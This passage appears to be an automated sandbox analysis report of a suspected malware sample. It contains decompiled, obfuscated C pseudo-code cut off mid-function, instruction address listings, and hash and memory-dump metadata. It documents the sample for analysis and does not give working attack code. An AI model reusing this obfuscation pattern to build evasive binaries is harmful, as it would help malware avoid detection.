							if(_t418 == 2 && _t613 == 0) {
								_t447 =  *0x1000cdc; // 0x84521e70
								 *(_t870 - 0x60) = ( *(_t870 - 0x68) ^ _t447 ^  *0x1000d00) * (_t447 + 0xffffbb58);
								_t780 =  *0x1000c94; // 0x0
								_t781 = _t780 * 0x2d40daef;
								 *(_t870 - 0x7c) =  *(_t870 - 0x7c) * ( *0x1000cec & 0x0000ffff);
								 *(_t870 - 0x90) = _t781;
								asm("cdq");
								 *(_t870 - 0x38) = ( *(_t870 - 0x84) & 0x0000ffff) + ( *(_t870 - 0x84) & 0x0000ffff) + ( *(_t870 - 0x84) & 0x0000ffff) + ( *(_t870 - 0x84) & 0x0000ffff) + ( *(_t870 - 0x84) & 0x0000ffff) + ( *(_t870 - 0x84) & 0x0000ffff) + ( *(_t870 - 0x84) & 0x0000ffff) + ( *(_t870 - 0x84) & 0x0000ffff);
								 *(_t870 - 0x34) = _t781;
							}
						} else {
							asm("cdq");
							 *0x1000cb8 =  *((intOrPtr*)(_t870 - 4)) - 0x4fef3c23;
							 *0x1000cbc = _t760;
							 *(_t870 - 0x4c) =  *0x1215420;
							 *0x1000cd0 =  *0x1000cd0 +  *0x1000cd0 -  *0x1000ce0;
						}
					}
					 *((short*)(_t870 - 0x154)) =  ~(( *(_t870 - 0xc4) +  *((intOrPtr*)(_t870 - 0xa4))) *  *(_t870 - 0xc4) *  *(_t870 - 0x14) ^ 0x0000701c);
					_t421 = 0x20b;
					do {
						 *(_t870 - 0xb) =  *(_t870 - 0xb) + 1;
						_t421 = _t421 - 1;
					} while (_t421 > 0);
					_t424 = ( *(_t870 - 0x18) & 0x0000ffff |  *0x1000c9a) +  *0x1000c9f;
					 *0x1000c84 = 0;
					if(_t424 != 0) {
						_t865 = 0;
						__eflags = 0;
					} else {
						_t301 = _t424 + 1; // 0x20b
						_t865 = _t301;
					}
					asm("cdq");
					_t771 =  *(_t870 - 0x2c);
					asm("cdq");
					asm("adc edx, [0x1000cc4]");
					_t430 = E00ECEE50(( *(_t870 - 0x18) & 0x0000ffff) + ( *(_t870 - 0xc) & 0x000000ff) + 1,  *(_t870 - 0xc), _t771 +  *0x1000cc0, _t771);
					asm("sbb edx, edi");
					 *0x1000c83 = 1;
					if((_t430 - _t865 | _t771) != 0) {
						 *0x1000c83 = 0;
					}
					if( *0x1000c84 == 0) {
						 *(_t870 - 0x24) = 0x83;
						asm("cdq");
						 *0x1000cc8 = ( *(_t870 - 0x18) & 0x0000ffff) + 0xf;
						_t439 =  *0x1000cd0; // 0x0
						 *0x1000ccc = _t771;
						 *(_t870 - 5) =  *(_t870 - 3) +  *(_t870 - 0x28) + (_t439 & 0x000000e4) - M01000CB0 +  *0x1000cb8 - 0x2d;
						asm("cdq");
						 *(_t870 - 0xa0) =  *(_t870 - 0xa0) -  *0x1000cd0 - 0x3811;
						asm("sbb [ebp-0x9c], edx");
					}
					_t314 = _t870 - 0x160; // 0x60f1ba1c
					_t772 = _t314;
					_t315 = _t870 - 0x1ac; // 0x60f1b9d0
					_t433 = _t315;
					MessageBoxW(GetForegroundWindow(), _t433, _t772, 0x10);
				}
				return 0;
			}

































































































                                              0x00ec6091
                                              0x00ec6096
                                              0x00ec60b4
                                              0x00ec60ba
                                              0x00ec60cc
                                              0x00ec60d2
                                              0x00ec6132
                                              0x00ec6134
                                              0x00ec613d
                                              0x00ec613d
                                              0x00ec6136
                                              0x00ec6136
                                              0x00ec6136
                                              0x00ec6146
                                              0x00ec614f
                                              0x00ec6155
                                              0x00ec6157
                                              0x00ec6162
                                              0x00ec6162
                                              0x00ec6162
                                              0x00ec6159
                                              0x00ec6159
                                              0x00ec615b
                                              0x00000000
                                              0x00ec615d
                                              0x00ec615d
                                              0x00ec615d
                                              0x00ec615b
                                              0x00ec6169
                                              0x00ec6170
                                              0x00ec6176
                                              0x00ec6179
                                              0x00ec617e
                                              0x00ec6186
                                              0x00ec618b
                                              0x00ec618d
                                              0x00ec6193
                                              0x00ec61f0
                                              0x00ec61f9
                                              0x00ec61f9
                                              0x00ec61fb
                                              0x00ec6206
                                              0x00ec6217
                                              0x00ec6218
                                              0x00ec621e
                                              0x00ec6224
                                              0x00ec6224
                                              0x00ec6227
                                              0x00ec622c
                                              0x00ec622c
                                              0x00ec6195
                                              0x00ec61a4
                                              0x00ec61b2
                                              0x00ec61b3
                                              0x00ec61b9
                                              0x00ec61bf
                                              0x00ec61cc
                                              0x00ec61db
                                              0x00ec61db
                                              0x00ec60e5
                                              0x00ec60f2
                                              0x00ec60f5
                                              0x00ec610e
                                              0x00ec6122
                                              0x00ec6124
                                              0x00ec6124
                                              0x00ec6237
                                              0x00ec6240
                                              0x00ec6243
                                              0x00ec6244
                                              0x00ec624a
                                              0x00ec6254
                                              0x00ec6254
                                              0x00ec624c
                                              0x00ec624c
                                              0x00ec6252
                                              0x00ec625b
                                              0x00ec625b
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00ec6252
                                              0x00ec625d
                                              0x00ec626a
                                              0x00ec6294
                                              0x00ec629c
                                              0x00ec629e
                                              0x00ec62a3
                                              0x00ec62a5
                                              0x00ec62b5
                                              0x00ec62b9
                                              0x00ec62cd
                                              0x00ec62cd
                                              0x00ec62d1
                                              0x00ec62dc
                                              0x00ec62df
                                              0x00ec62df
                                              0x00ec626c
                                              0x00ec627a
                                              0x00ec627a
                                              0x00ec62f0
                                              0x00ec62f6
                                              0x00ec6313
                                              0x00ec6323
                                              0x00ec632d
                                              0x00ec6332
                                              0x00ec633b
                                              0x00ec634a
                                              0x00ec6352
                                              0x00ec6415
                                              0x00ec641b
                                              0x00ec6463
                                              0x00ec6465
                                              0x00ec6471
                                              0x00ec6483
                                              0x00ec648e
                                              0x00ec6496
                                              0x00ec64a2
                                              0x00ec64a7
                                              0x00ec64b8
                                              0x00ec64be
                                              0x00ec64bf
                                              0x00ec64c2
                                              0x00ec64e8
                                              0x00ec64e8
                                              0x00ec64ea
                                              0x00ec64ea
                                              0x00ec641d
                                              0x00ec6435
                                              0x00ec643b
                                              0x00ec644b
                                              0x00ec644b
                                              0x00ec6358
                                              0x00ec635d
                                              0x00ec6363
                                              0x00ec6368
                                              0x00ec637a
                                              0x00ec637c
                                              0x00ec63eb
                                              0x00ec63f5
                                              0x00ec63fb
                                              0x00ec6404
                                              0x00ec6407
                                              0x00ec637e
                                              0x00ec639d
                                              0x00ec63af
                                              0x00ec63b8
                                              0x00ec63c3
                                              0x00ec63c6
                                              0x00ec63c9
                                              0x00ec63c9
                                              0x00ec637c
                                              0x00ec635d
                                              0x00ec64f8
                                              0x00ec650d
                                              0x00ec6513
                                              0x00ec6521
                                              0x00ec6530
                                              0x00ec6537
                                              0x00ec653c
                                              0x00ec6548
                                              0x00ec6549
                                              0x00ec6556
                                              0x00ec6568
                                              0x00ec656c
                                              0x00ec657f
                                              0x00ec6594
                                              0x00ec6594
                                              0x00ec65a3
                                              0x00ec65af
                                              0x00ec65b5
                                              0x00ec66c2
                                              0x00ec66cb
                                              0x00ec66ce
                                              0x00ec66dd
                                              0x00ec66e0
                                              0x00ec66eb
                                              0x00ec6700
                                              0x00ec6706
                                              0x00ec670c
                                              0x00ec670c
                                              0x00ec65bb
                                              0x00ec65c3
                                              0x00ec65c6
                                              0x00ec65cb
                                              0x00ec65d1
                                              0x00ec65d6
                                              0x00ec65dc
                                              0x00ec65fd
                                              0x00ec6600
                                              0x00ec6603
                                              0x00ec6604
                                              0x00ec660a
                                              0x00ec661d
                                              0x00ec661d
                                              0x00ec661d
                                              0x00ec660c
                                              0x00ec660c
                                              0x00ec6616
                                              0x00ec6616
                                              0x00ec660e
                                              0x00ec660e
                                              0x00ec6614
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00ec6614
                                              0x00ec660c
                                              0x00ec662b
                                              0x00ec6634
                                              0x00ec6636
                                              0x00ec6643
                                              0x00ec664d
                                              0x00ec6651
                                              0x00ec665c
                                              0x00ec6675
                                              0x00ec667a
                                              0x00ec6686
                                              0x00ec66a0
                                              0x00ec66b3
                                              0x00ec66b3
                                              0x00ec65de
                                              0x00ec65de
                                              0x00ec65ee
                                              0x00ec65f5
                                              0x00ec65e0
                                              0x00ec65e0
                                              0x00ec65e6
                                              0x00ec65ec
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00ec65ec
                                              0x00ec65de
                                              0x00ec65dc
                                              0x00ec65cb
                                              0x00ec6711
                                              0x00ec6717
                                              0x00ec6721
                                              0x00ec6727
                                              0x00ec6728
                                              0x00ec6729
                                              0x00ec672b
                                              0x00ec673a
                                              0x00ec673a
                                              0x00ec6733
                                              0x00ec6733
                                              0x00ec6733
                                              0x00ec6746
                                              0x00ec674b
                                              0x00ec6793
                                              0x00ec6796
                                              0x00ec674d
                                              0x00ec675a
                                              0x00ec6764
                                              0x00ec6767
                                              0x00ec676a
                                              0x00ec676e
                                              0x00ec677a
                                              0x00ec677b
                                              0x00ec677c
                                              0x00ec6780
                                              0x00ec6780
                                              0x00ec679f
                                              0x00ec67a5
                                              0x00ec67b1
                                              0x00ec67bf
                                              0x00ec67c5
                                              0x00ec67cd
                                              0x00ec67cd
                                              0x00ec6822
                                              0x00ec682e
                                              0x00ec6847
                                              0x00ec684d
                                              0x00ec6854
                                              0x00ec685b
                                              0x00ec6862
                                              0x00ec6869
                                              0x00ec6870
                                              0x00ec6877
                                              0x00ec687e
                                              0x00ec6885
                                              0x00ec688c
                                              0x00ec6893
                                              0x00ec689a
                                              0x00ec68a1
                                              0x00ec68b0
                                              0x00ec68b0
                                              0x00ec68bc
                                              0x00ec68d1
                                              0x00ec68da
                                              0x00ec68dd
                                              0x00ec68de
                                              0x00ec68e0
                                              0x00ec68f5
                                              0x00ec68f5
                                              0x00ec68f5
                                              0x00ec68e2
                                              0x00ec68e2
                                              0x00ec68ee
                                              0x00ec68ee
                                              0x00ec68e4
                                              0x00ec68ea
                                              0x00ec68ec
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00ec68ec
                                              0x00ec68e2
                                              0x00ec68f9
                                              0x00ec68fb
                                              0x00ec690a
                                              0x00ec6910
                                              0x00ec6928
                                              0x00ec6931
                                              0x00ec693c
                                              0x00ec694b
                                              0x00ec6956
                                              0x00ec6956
                                              0x00ec695b
                                              0x00ec695b
                                              0x00ec68fd
                                              0x00ec68fd
                                              0x00ec68fd
                                              0x00ec68be
                                              0x00ec68be
                                              0x00ec68c8
                                              0x00ec68c8
                                              0x00ec6962
                                              0x00ec696c
                                              0x00ec6976
                                              0x00ec6981
                                              0x00ec6989
                                              0x00ec698f
                                              0x00ec699c
                                              0x00ec699e
                                              0x00ec69a2
                                              0x00ec69a8
                                              0x00ec69b2
                                              0x00ec69b4
                                              0x00ec69b4
                                              0x00ec69d7
                                              0x00ec69dd
                                              0x00ec69e3
                                              0x00ec6a02
                                              0x00ec6a20
                                              0x00ec6a35
                                              0x00ec6a3d
                                              0x00ec6a3d
                                              0x00ec6a66
                                              0x00ec6a68
                                              0x00ec6a6f
                                              0x00ec6a76
                                              0x00ec6a80
                                              0x00ec6a86
                                              0x00ec6a8f
                                              0x00ec6a95
                                              0x00ec6aa3
                                              0x00ec6aac
                                              0x00ec6ab2
                                              0x00ec6aba
                                              0x00ec6abc
                                              0x00ec6b8a
                                              0x00ec6b91
                                              0x00ec6ba3
                                              0x00ec6ba8
                                              0x00ec6bae
                                              0x00ec6bb5
                                              0x00ec6bb5
                                              0x00ec6bbb
                                              0x00ec6ac2
                                              0x00ec6ac5
                                              0x00ec6ace
                                              0x00ec6ae0
                                              0x00ec6ae9
                                              0x00ec6af2
                                              0x00ec6af2
                                              0x00ec6aeb
                                              0x00ec6aeb
                                              0x00ec6aeb
                                              0x00ec6af7
                                              0x00ec6aff
                                              0x00ec6b08
                                              0x00ec6b08
                                              0x00ec6b01
                                              0x00ec6b01
                                              0x00ec6b01
                                              0x00ec6b1f
                                              0x00ec6b2f
                                              0x00ec6b32
                                              0x00ec6b34
                                              0x00ec6b3c
                                              0x00ec6b3e
                                              0x00ec6b41
                                              0x00ec6b49
                                              0x00ec6b57
                                              0x00ec6b65
                                              0x00ec6b6b
                                              0x00ec6b6e
                                              0x00ec6b76
                                              0x00ec6b76
                                              0x00ec6ac5
                                              0x00ec6bc2
                                              0x00ec6bc8
                                              0x00ec6bcf
                                              0x00ec6bd5
                                              0x00ec6bdc
                                              0x00ec6be3
                                              0x00ec6bef
                                              0x00ec6bf6
                                              0x00ec6bfc
                                              0x00ec6c05
                                              0x00ec6c0c
                                              0x00ec6c12
                                              0x00ec6c1a
                                              0x00ec6c26
                                              0x00ec6c2c
                                              0x00ec6c31
                                              0x00ec6c35
                                              0x00ec6c35
                                              0x00ec6c38
                                              0x00ec6c48
                                              0x00ec6c4b
                                              0x00ec6c54
                                              0x00ec6c59
                                              0x00ec6c60
                                              0x00ec6c60
                                              0x00ec6c63
                                              0x00ec6c69
                                              0x00ec6c74
                                              0x00ec6ca8
                                              0x00ec6cae
                                              0x00ec6cb1
                                              0x00ec6cb2
                                              0x00ec6cb4
                                              0x00ec6cba
                                              0x00ec6cd5
                                              0x00ec6ce9
                                              0x00ec6cf7
                                              0x00ec6cfd
                                              0x00ec6d05
                                              0x00ec6d0b
                                              0x00ec6cb6
                                              0x00ec6cb6
                                              0x00ec6cb8
                                              0x00ec6d19
                                              0x00ec6d19
                                              0x00ec6d1d
                                              0x00ec6d1d
                                              0x00ec6d1f
                                              0x00ec6d24
                                              0x00ec6d27
                                              0x00ec6d2e
                                              0x00ec6d2f
                                              0x00ec6d2f
                                              0x00ec6d30
                                              0x00ec6d34
                                              0x00ec6d35
                                              0x00ec6d3b
                                              0x00ec6d40
                                              0x00ec6d4d
                                              0x00ec6d50
                                              0x00ec6d5e
                                              0x00ec6d64
                                              0x00ec6d64
                                              0x00ec6d66
                                              0x00ec6d6d
                                              0x00ec6d6e
                                              0x00ec6d6e
                                              0x00ec6d71
                                              0x00ec6d73
                                              0x00ec6d75
                                              0x00ec6d75
                                              0x00ec6d75
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00ec6cb8
                                              0x00ec6c76
                                              0x00ec6c7d
                                              0x00ec6c83
                                              0x00ec6c86
                                              0x00ec6c8d
                                              0x00ec6c98
                                              0x00ec6c9d
                                              0x00ec6c9d
                                              0x00ec6c74
                                              0x00ec6e5d
                                              0x00ec6e65
                                              0x00ec6e66
                                              0x00ec6e6f
                                              0x00ec6e7d
                                              0x00ec6e87
                                              0x00ec6e8d
                                              0x00ec6e94
                                              0x00ec6e9d
                                              0x00ec6ea2
                                              0x00ec6ea9
                                              0x00ec6eab
                                              0x00ec6f65
                                              0x00ec6f6b
                                              0x00ec6f6d
                                              0x00ec6f76
                                              0x00ec6f76
                                              0x00ec6f6f
                                              0x00ec6f6f
                                              0x00ec6f6f
                                              0x00ec6f7e
                                              0x00ec6f7e
                                              0x00ec6f82
                                              0x00ec6eb1
                                              0x00ec6eb4
                                              0x00ec6ebd
                                              0x00ec6ed4
                                              0x00ec6ef3
                                              0x00ec6efa
                                              0x00ec6f03
                                              0x00ec6f09
                                              0x00ec6f0c
                                              0x00ec6f22
                                              0x00ec6f23
                                              0x00ec6f26
                                              0x00ec6f26
                                              0x00ec6f2b
                                              0x00ec6f36
                                              0x00ec6f37
                                              0x00ec6f4a
                                              0x00ec6f56
                                              0x00ec6f59
                                              0x00ec6f59
                                              0x00ec6eb4
                                              0x00ec6fa9
                                              0x00ec6fb0
                                              0x00ec6fb5
                                              0x00ec6fb5
                                              0x00ec6fb8
                                              0x00ec6fb9
                                              0x00ec6fd4
                                              0x00ec6fd6
                                              0x00ec6fdc
                                              0x00ec6fe3
                                              0x00ec6fe3
                                              0x00ec6fde
                                              0x00ec6fde
                                              0x00ec6fde
                                              0x00ec6fde
                                              0x00ec6ff6
                                              0x00ec6ff9
                                              0x00ec7002
                                              0x00ec7009
                                              0x00ec7013
                                              0x00ec701a
                                              0x00ec701e
                                              0x00ec7025
                                              0x00ec7027
                                              0x00ec7027
                                              0x00ec7035
                                              0x00ec703c
                                              0x00ec704a
                                              0x00ec704b
                                              0x00ec7050
                                              0x00ec705d
                                              0x00ec7081
                                              0x00ec7084
                                              0x00ec7085
                                              0x00ec708b
                                              0x00ec708b
                                              0x00ec7091
                                              0x00ec7091
                                              0x00ec7097
                                              0x00ec7097
                                              0x00ec7872
                                              0x00ec7872
                                              0x00ec7880

                                              APIs
                                              • TlsGetValue.KERNEL32(00000001), ref: 00EC6274
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.423883840.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                              • Associated: 00000000.00000002.423879545.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.424170838.0000000000FFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.424177261.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.424207782.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_ec0000_5GPueTFF2S.jbxd
                                              Similarity
                                              • API ID: Value
                                              • String ID: %GR$RPSQ8~$S$j
                                              • API String ID: 3702945584-3363877662
                                              • Opcode ID: f47d859c0a8c68b1fdc5de77437d972dcbe488b3de4d001e30536cbad1508981
                                              • Instruction ID: ea62302f53de6b981e121d824aa93632043af74e6f9d716551f7e967d7d53d26
                                              • Opcode Fuzzy Hash: f47d859c0a8c68b1fdc5de77437d972dcbe488b3de4d001e30536cbad1508981
                                              • Instruction Fuzzy Hash: 7742E5309042598FCB25CF68D591FFEBBB2FB55344F1491AEE089A734DDA3A4942CB10
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00EC603D Relevance: 12.9, APIs: 3, Strings: 4, Instructions: 610COMMONCrypto
                                              Download Yara Rule
                                              C-Code - Quality: 84%
                                              			E00EC603D(signed int __eax, signed int __ebx, void* __edx) {
				signed int _t325;
				signed char _t330;
				signed short _t331;
				signed int _t336;
				signed short _t361;
				signed short _t362;
				intOrPtr _t373;
				signed int _t374;
				void* _t382;
				signed int _t394;
				signed int _t395;
				signed int _t397;
				signed int _t400;
				signed short _t403;
				signed int _t407;
				signed int _t413;
				intOrPtr _t414;
				signed int _t415;
				signed int _t417;
				signed int _t420;
				signed short _t421;
				void* _t423;
				void* _t426;
				void* _t432;
				WCHAR* _t435;
				signed char _t441;
				signed short _t449;
				signed short _t465;
				signed int _t475;
				signed int _t481;
				signed int _t483;
				signed short _t484;
				signed int _t490;
				signed int _t514;
				signed int _t540;
				signed short _t548;
				signed int _t550;
				signed int _t580;
				intOrPtr _t584;
				signed int _t586;
				signed int _t599;
				signed int _t603;
				signed int _t612;
				signed int _t614;
				signed int _t616;
				signed int _t631;
				signed int _t633;
				signed int _t635;
				signed int _t640;
				signed short _t641;
				signed int _t663;
				signed int _t675;
				signed int _t678;
				char _t687;
				signed int _t691;
				signed int _t701;
				signed int _t707;
				signed int _t708;
				signed int _t723;
				signed int _t725;
				signed int _t729;
				intOrPtr _t734;
				signed int _t735;
				signed int _t736;
				signed short _t739;
				signed int _t747;
				signed int _t751;
				signed int _t753;
				signed int _t756;
				signed int _t762;
				signed int _t773;
				WCHAR* _t774;
				signed int _t782;
				signed int _t783;
				signed int _t793;
				signed int _t804;
				signed int _t807;
				signed int _t808;
				signed int _t811;
				signed int _t838;
				signed int _t853;
				signed int _t857;
				intOrPtr _t863;
				signed int _t865;
				signed int _t866;
				signed int _t867;
				void* _t872;
				void* _t878;
				void* _t879;
				signed int _t884;
				void* _t891;
				void* _t892;
				void* _t893;
				void* _t913;

				_t540 = __ebx;
				asm("outsb");
				if((__eax & 0x000000b4) > 0) {
					L1:
					goto L5;
				} else {
					if(__eflags >= 0) {
						if(__eflags < 0) {
							goto L1;
						} else {
							asm("enter 0x882d, 0xf2");
							__eflags = __edx;
						}
						L5:
					}
				}
				_t701 =  *0x1215420;
				 *(_t872 - 0x20) = _t701;
				 *(_t872 - 0xb4) =  *(_t872 - 0x20) + 0x276;
				if( *0x1000c9b != 0 || ( *0x1000c83 & 0x000000ff) >  *(_t872 - 0x90)) {
					__eflags =  *(_t872 - 0xc) -  *(_t872 - 5);
					if( *(_t872 - 0xc) <=  *(_t872 - 5)) {
						_t548 = 0;
						__eflags = 0;
					} else {
						_t548 = 1;
					}
					asm("cdq");
					asm("adc edx, [0x1000d14]");
					__eflags = ( *0x1000c98 & 0x0000ffff) +  *0x1000d10 - _t548;
					if(( *0x1000c98 & 0x0000ffff) +  *0x1000d10 != _t548) {
						L17:
						_t325 = 0;
						__eflags = 0;
					} else {
						__eflags = _t701;
						if(_t701 != 0) {
							goto L17;
						} else {
							_t325 = 1;
						}
					}
					__eflags =  *0x1000cf8 - _t540;
					 *(_t872 - 0xa8) = _t540;
					_t550 = 0 |  *0x1000cf8 == _t540;
					__eflags = _t550 -  *(_t872 - 0x28);
					asm("sbb ecx, ecx");
					__eflags = ( *(_t872 - 3) & 0x000000ff) - _t550 + 1;
					__eflags = _t325 - (0 | ( *(_t872 - 3) & 0x000000ff) - _t550 + 0x00000001 < 0x00000000);
					_t540 =  *(_t872 - 0xa8);
					if(__eflags != 0) {
						__eflags =  *(_t872 - 0x8c);
						_t707 =  *(_t872 - 0x8c) - (0 |  *(_t872 - 0x8c) == 0x00000000);
						__eflags = _t707;
						if(__eflags != 0) {
							 *0x1000ca0 =  *0x1215420;
							asm("cdq");
							 *0x1000cbc = _t707;
							_t707 =  *0x1000ce8;
							_t691 = ( *(_t872 - 0xe) & 0x000000ff) * _t707;
							__eflags = _t691;
							 *0x1000cb8 =  *0x1000c9a - 0x20f4;
							 *(_t872 - 0xe) = _t691;
						}
					} else {
						 *(_t872 - 0x18) =  *0x1000ca4 - ( *(_t872 - 0xb) & 0xff);
						asm("cdq");
						 *0x1000cf0 =  *0x1000cf0 - ( *(_t872 - 9) & 0x000000ff);
						asm("sbb [0x1000cf4], edx");
						_t707 =  *(_t872 - 0x64);
						 *0x1000c94 =  *(_t872 - 0x68) + 0xbfc4;
						 *(_t872 - 0x6c) = ( *(_t872 - 0xa) & 0xff) * 0x9564;
					}
				} else {
					 *(_t872 - 0x28) =  *0x1000cd2 + 0xd71b;
					 *(_t872 - 0x24) =  *(_t872 - 0x24) - 1;
					 *(_t872 - 0xb) = ( *(_t872 - 0xb) & 0x000000ff) +  *0x1000c9e - ( *(_t872 - 0xb) & 0xff);
					_t707 = ( *(_t872 - 5) & 0x000000ff) + ( *(_t872 - 5) & 0x000000ff &  *0x1000cd8);
					 *(_t872 - 5) = _t707;
				}
				 *(_t872 - 0xac) =  *(_t872 - 0x20) + 0x2e4;
				_t330 =  *(_t872 - 1);
				asm("cdq");
				_t878 = _t330 -  *0x1000d10; // 0x0
				if(_t878 != 0) {
					L24:
					_t331 = 1;
				} else {
					_t879 = _t707 -  *0x1000d14; // 0x0
					if(_t879 == 0) {
						_t331 = 0;
						__eflags = 0;
					} else {
						goto L24;
					}
				}
				_t708 =  *(_t872 - 1);
				if(_t331 > (0 | _t708 != 0x00000030)) {
					asm("cdq");
					asm("sbb esi, edx");
					asm("cdq");
					__eflags =  *0x1000d10 - ( *(_t872 - 0x18) & 0x0000ffff) |  *0x1000c84 |  *0x1000d14 | _t708;
					if(__eflags != 0) {
						 *(_t872 - 0x1c) =  *(_t872 - 0x38) *  *(_t872 - 0x1c);
						 *(_t872 - 0x28) = 0x3090bb2d;
						_t838 =  *(_t872 - 1) + 0x23;
						__eflags = _t838;
						 *0x1000c9a = _t838;
						 *(_t872 - 0x40) = E00ECEE50( *(_t872 - 0x38),  *(_t872 - 0x34), 0x7d, _t540);
						 *(_t872 - 0x3c) = _t838;
					}
				} else {
					 *0x1000c9f = TlsGetValue( *(_t872 - 0x60));
				}
				 *(_t872 - 0xb8) =  *(_t872 - 0x20) + 0x2bc;
				 *(_t872 - 0x20) =  *0x1215420;
				 *0x1000cd0 = 0xfffff41d;
				 *0x1000cd8 = (1 -  *0x1000d18) *  *0x1000cd8;
				_t336 =  *0x1000cb8; // 0x4
				 *0x1000c94 =  *(_t872 - 0x38) * 0xdcf2d26f;
				 *(_t872 - 0x90) = _t336 & 0x00000006;
				 *(_t872 - 0x14) =  *(_t872 - 0x20) + 0x3b1;
				if( *(_t872 - 0x7c) == 0) {
					__eflags =  *0x1000ca8 |  *0x1000cac;
					if(__eflags != 0) {
						__eflags =  !( *0x1000d10) |  !( *0x1000d14);
						if(__eflags != 0) {
							 *0x1000ca4 =  *0x1000ca4 - 1;
							asm("adc ecx, [0x1000cbc]");
							 *(_t872 - 0x38) =  *(_t872 - 0x38) +  *0x1000cb8 + 0xd0056b0c;
							asm("adc ecx, 0xfff005d1");
							asm("adc eax, 0xfff765fd");
							 *0x1000ce4 =  *0x1000d04;
							 *0x1000ce0 =  *0x1000d00 + 0x1e29880a;
							asm("cdq");
							 *(_t872 - 0x38) =  *(_t872 - 0x38) -  *(_t872 - 1) + 0x10;
							asm("sbb [ebp-0x34], edx");
							_t675 = ( *(_t872 - 0xa0) +  *(_t872 - 0x18) + 2) * 0x6a +  *0x1000c98 * 0x41;
							__eflags = _t675;
							 *0x1000c83 = _t675;
						}
					} else {
						 *0x1000ca4 = ( *(_t872 - 0x68) +  *0x1000ca4) *  *0x1000ca4;
						 *(_t872 - 0x30) =  *(_t872 - 0x30) -  *(_t872 - 0x40);
						 *(_t872 - 0x24) =  *0x1000c84 + 0x6491;
					}
				} else {
					if( *(_t872 - 0x6c) != 0) {
						_t514 =  *0x1000ce0; // 0x0
						_t678 =  *0x1000ce4; // 0x0
						_t884 = _t514 ^  *0x1000d18 | _t678 ^  *0x1000d1c;
						if(_t884 == 0) {
							 *0x1000c84 = 0x78;
							 *0x1000cc8 =  *0x1000ca8 & 0x430b161a;
							 *0x1000ccc = _t540;
							 *(_t872 - 3) =  *0x1215420;
							 *(_t872 - 0x70) =  *0x1000cb4 << 4;
						} else {
							 *0x1000c88 =  *0x1000c9f + 0x60ad17c2 ^  *0x1000c94;
							_t687 =  *0x1000c9c; // -44
							 *0x1000c8c = _t540;
							 *((char*)(_t872 - 4)) =  *(_t872 - 0xd) & 0xffffff00 | _t884 == 0x00000000;
							 *(_t872 - 0x4c) = ( *0x1000c98 & 0x0000ffff) + 0x73bfbdfe;
							 *0x113d808 = _t687;
						}
					}
				}
				 *((intOrPtr*)(_t872 - 0xa4)) =  *(_t872 - 0x20) + 0x241;
				 *(_t872 - 0xc4) =  *(_t872 - 0x20) + 0x273;
				 *(_t872 - 0x20) =  *0x1215420;
				 *(_t872 - 6) = E00EC1000();
				asm("sbb ecx, ecx");
				asm("sbb edx, edx");
				if(( *(_t872 - 6) & 0x000000ff) + 1 >  *((intOrPtr*)(_t872 - 4)) + 1) {
					asm("cdq");
					 *0x1000ce0 =  *0x1000ce0;
					asm("sbb [0x1000ce4], edx");
					 *(_t872 - 0x18) =  *(_t872 - 0x70) - 0x23c803e3;
					 *(_t872 - 0x28) =  *0x1215420;
					 *0x1000cd2 = 0 - ( *(_t872 - 0xa0) ^ 0);
					 *0x1000cd8 = ( *(_t872 - 8) & 0xff) +  *(_t872 - 0x6c) + 1;
				}
				 *(_t872 - 0xa8) =  *(_t872 - 0x20) + 0x83;
				_t889 =  *(_t872 - 0xa0) |  *(_t872 - 0x9c);
				if(( *(_t872 - 0xa0) |  *(_t872 - 0x9c)) == 0) {
					asm("sbb eax, eax");
					asm("cdq");
					_t723 =  *(_t872 - 0x30) & 0x0000ffff;
					asm("cdq");
					asm("sbb edx, ebx");
					 *0x1000d18 = E00ECEE50(( ~( *(_t872 - 0x28)) + 1) * ( *(_t872 - 0x1c) & 0x0000ffff),  *(_t872 - 0x1c) & 0x0000ffff, _t723 -  *(_t872 - 0x48), _t723);
					 *0x1000d1c = _t723;
					 *0x1000cd8 = ( *0x1000c9b & 0x000000ff) - 0x23e5;
					_t540 = 0;
					__eflags = 0;
				} else {
					 *(_t872 - 0x4c) = E00EC1370(_t889) & 0x000000ff;
					_t808 =  *(_t872 - 0x4c);
					if(_t808 <= 0) {
						_t481 =  *0x1000cac; // 0x106b42
						_t891 = _t481 -  *0x1000c8c; // 0xfff500a5
						if(_t891 > 0) {
							L47:
							_t483 =  *(_t872 - 0xa) & 0x000000ff;
							asm("cdq");
							__eflags = _t808 -  *0x1000d14;
							if(__eflags < 0) {
								L51:
								_t484 = 0;
								__eflags = 0;
							} else {
								if(__eflags > 0) {
									L50:
									_t484 = 1;
								} else {
									__eflags = _t483 -  *0x1000d10;
									if(_t483 <=  *0x1000d10) {
										goto L51;
									} else {
										goto L50;
									}
								}
							}
							 *(_t872 - 8) =  *0x1000c90 - ( *(_t872 - 8) == 0);
							__eflags = _t484 - ( *0x1000c90 ==  *(_t872 - 8) == 0);
							if(_t484 <= ( *0x1000c90 ==  *(_t872 - 8) == 0)) {
								_t811 =  *0x1215420;
								 *(_t872 - 0x80) = _t811;
								asm("cdq");
								asm("cdq");
								_t490 = E00ECEE50(E00ECEE50( *(_t872 - 0x24), _t811, ( *0x1000cd4 & 0x0000ffff) + 0x43, _t811), _t811,  *0x1000d18,  *0x1000d1c);
								 *0x1000ce4 = _t811;
								 *0x1000ce0 = _t490;
								 *(_t872 - 0x88) = (( *(_t872 - 3) & 0x000000ff) - ( *(_t872 - 6) & 0x000000ff)) *  *0x1000d18;
								 *(_t872 - 0x2c) = ( *(_t872 - 0x84) & 0x0000ffff) - 0x86;
							}
						} else {
							if(_t891 < 0) {
								L46:
